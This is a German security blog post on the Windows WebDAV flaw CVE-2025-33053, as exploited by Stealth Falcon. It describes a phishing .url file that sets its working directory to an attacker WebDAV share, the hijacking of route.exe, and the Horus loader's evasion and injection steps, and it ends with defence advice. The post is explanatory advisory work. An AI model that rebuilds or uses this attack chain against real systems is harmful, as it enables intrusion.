Kritische WebDAV Schwachstelle bedroht Windows Systeme

Anfang Juni 2025 veröffentlichte Checkpoint Security einen Exploit der WebDAV Schnittstelle, der zur Remote Code Execution genutzt werden kann. Im Kern beruht die Schwachstelle CVE-2025-33053 auf einer Lücke in der Art und Weise, wie Windows über eine WebDAV-URL den Arbeits­verzeichnis­pfad für einen Aufruf eines legitimen Diagnostics-Tools (iediagcmd.exe) manipulieren lässt. Stealth Falcon nutzt diese Schwachstelle in drei Schritten aus:

  1. Phishing-Einstieg mit .url-Datei
    • Eine speziell präparierte InternetShortcut-Datei (z.B. TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url) wird per Spear-Phishing verschickt.
    • Im Abschnitt [InternetShortcut] wird nicht nur der Pfad zu iediagcmd.exe definiert, sondern über WorkingDirectory=\\attacker\.server@ssl@443\DavWWWRoot\… auch das Arbeitsverzeichnis auf einen von den Angreifern kontrollierten WebDAV-Server umgeleitet.
  2. Ausnutzung des Suchpfad-Verhaltens
    • Wenn Windows iediagcmd.exe startet, führt es (via .NET Process.Start()) diverse Hilfsprogramme aus, z. B. route.exe.
    • Dank manipuliertem Arbeitsverzeichnis lädt das Tool nicht die System-Version von route.exe aus System32, sondern die gleichnamige bösartige Datei vom WebDAV-Server – und führt sie aus.
    • Auf diese Weise wird der erste Loader‐Code („Horus Loader“) eingeschleust, ohne dass eine klassische Exploit-Code-Injektion nötig wäre.
  3. Multi-Stage-Loader und Horus Agent
    • Horus Loader (in C++ mit Code Virtualizer geschützt) führt in mehreren Phasen aus:
      1. Evasions: Manuelles Mapping von kernel32.dll und ntdll.dll, Erkennung von AV-Prozessen (109 Prozessnamen) und ggf. Abbruch.
      2. Decoy-Dokument: Aus verschlüsselter .udata-Sektion wird eine PDF in %TEMP% geschrieben und geöffnet – Ablenkung für den Nutzer.
      3. Payload-Extraktion: IPv6-“IPfuscation” entschlüsselt in Tausenden von Aufrufen den eigentlichen Shellcode.
      4. In-Memory-Injection: Der Loader startet msedge.exe im Suspended-Zustand, injiziert den Payload via ZwWriteVirtualMemory & Co., setzt den Thread-Kontext und fährt fort.
    • Horus Agent (C++-Implant auf Basis Mythic C2):
      • Nutzt RC4 und AES-HMAC für Konfig- und Netzwerkverschleierung.
      • Unterstützt Kern-Commands wie survey (System-Fingerprinting), shinjectchunked (chunked Shellcode-Injection), upload, ls, exit etc.
      • Baut auf Anti-Analysis-Techniken auf: OLLVM-basierte Control-Flow-Flattening, String-Verschlüsselung, API-Hashing und schein­bar harmlose Unused-Imports, um statische Analysen zu verwirren.

Verteidigungs­empfehlungen

  • WebDAV-Dienste sofort isolieren oder ganz deaktivieren, bis Microsofts Patch vom 10. Juni 2025 eingespielt ist.
  • Monitoring auf ungewöhnliche Prozessstarts: Insbesondere iediagcmd.exe, route.exe, CustomShellHost.exe aus externen Pfaden.
  • Einschränkung von .url-Dateien über Gruppenrichtlinien (AppLocker) und konsequentes Blockieren von Netzlaufwerken per UNC mit WebDAV.
  • Endpoint-Detection: Signaturen für Code Virtualizer, ungewöhnliche IPv6-Strings oder das Horus-Implant erkennen.

Mit dieser mehrstufigen Kette – von der .url-Datei bis zum stealthigen Mythic-Implant – zeigt Stealth Falcon, wie eine „harmlos“ erscheinende Shortcut-Datei zu einer vollständigen Remote-Code-Ausführung und verdeckten APT-Infrastruktur führen kann.

Um sich zu schützen wird die Aktualisierung der Windows Systeme dringend empfohlen. Ein Überblick über die gepatchten Versionen finden Sie hier.

Related Posts

Kritische Sicherheitslücke im Dell NAS System PowerScale

Dell hat am 4. Juni 2025 die Sicherheitsempfehlung DSA-2025-208 für PowerScale OneFS veröffentlicht, mit der mehrere teils kritische Schwachstellen gestopft werden. Besonders gravierend ist eine fehlende Authorisierung in der NFS-Exportfunktion (CVE-2024-53298, CVSS 9.8), über die sich ein Angreifer unbemerkt Zugriff auf beliebige Dateien verschaffen und das System komplett kompromittieren kann. Darüber hinaus wurden eine SQL-Injection in OneFS (CVE-2025-32753, CVSS 5.3) sowie weitere Lücken in FreeBSD-Komponenten (CVE-2024-53580) und im SupportAssist (CVE-2024-39689, CVE-2024-51538) behoben.

Read More

SMB: Kerberos Reflective Relay Angriff führt zu Privilege Esacalation in Windows Netzwerken

Hohe Gefahr durch Windows SMB – CVE-2025-33073 ermöglicht Privilegienerweiterung über das Netzwerk, mit Hilfe der Reflective Kerberos Relay Angriffstechnik. Ein autorisierter Angreifer kann aufgrund unzureichender Zugriffskontrolle in SMB seine Rechte ausweiten. Die NVD klassifiziert die Schwachstelle mit CVSS 3.1 Score 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) als High Severity (nvd.nist.gov). Microsoft veröffentlichte die Behebung im Juni-Patchday am 10. Juni 2025.

Read More

Anthropic-Modell Claude 4 Opus zeigt besorgniserregendes Verhalten

Mit der Vorstellung seines neuesten KI-Modells Claude 4 Opus hat das US-Unternehmen Anthropic nicht nur technologische Fortschritte demonstriert, sondern auch alarmierende Verhaltensweisen offenbart, die Sicherheitsdebatten neu entfachen.

Read More